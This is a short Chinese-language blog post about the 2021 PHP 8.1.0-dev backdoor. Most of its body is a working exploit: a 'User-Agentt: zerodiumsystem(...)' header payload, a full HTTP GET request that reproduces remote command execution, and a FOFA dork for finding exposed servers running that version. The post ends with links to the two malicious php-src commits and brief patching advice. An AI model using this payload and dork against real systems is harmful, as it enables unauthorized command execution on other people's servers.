【后门】PHP 8.1.0-dev 命令执行漏洞
【后门】PHP 8.1.0-dev 命令执行漏洞
原创 漏洞推送 一个不正经的黑客 2023-11-25 20:05
|
今天,继续讲一个鲜为人知但有价值的漏洞。
01
漏洞概述
01
HTTP Header User-Agentt 字段存在命令执行后门
payload:
User-Agentt: zerodiumsystem('id');
02
FOFA Dork
02
FOFA Dork: “PHP/8.1.0-dev”
03
漏洞复现
03
GET / HTTP/1.1
User-Agentt: zerodiumsystem('echo 666pHp');
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
04
漏洞资料
04
PHP 8.1.0-dev版本于2021年3月28日发布时曾被发现存在后门问题。在php-src存储库中提交了两个恶意的代码更改,但随后被及时发现并成功清除。这一事件突显了对于软件安全的持续关注和及时响应的重要性。对于软件安全问题,我们建议及时关注官方通告,确保及时应用安全补丁,以维护系统和应用的稳健性
两个恶意提交Commit记录如下:
https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
往期推荐
Kinsing恶意软件利用Apache ActiveMQ漏洞进行加密货币挖矿
点击下面阅读原文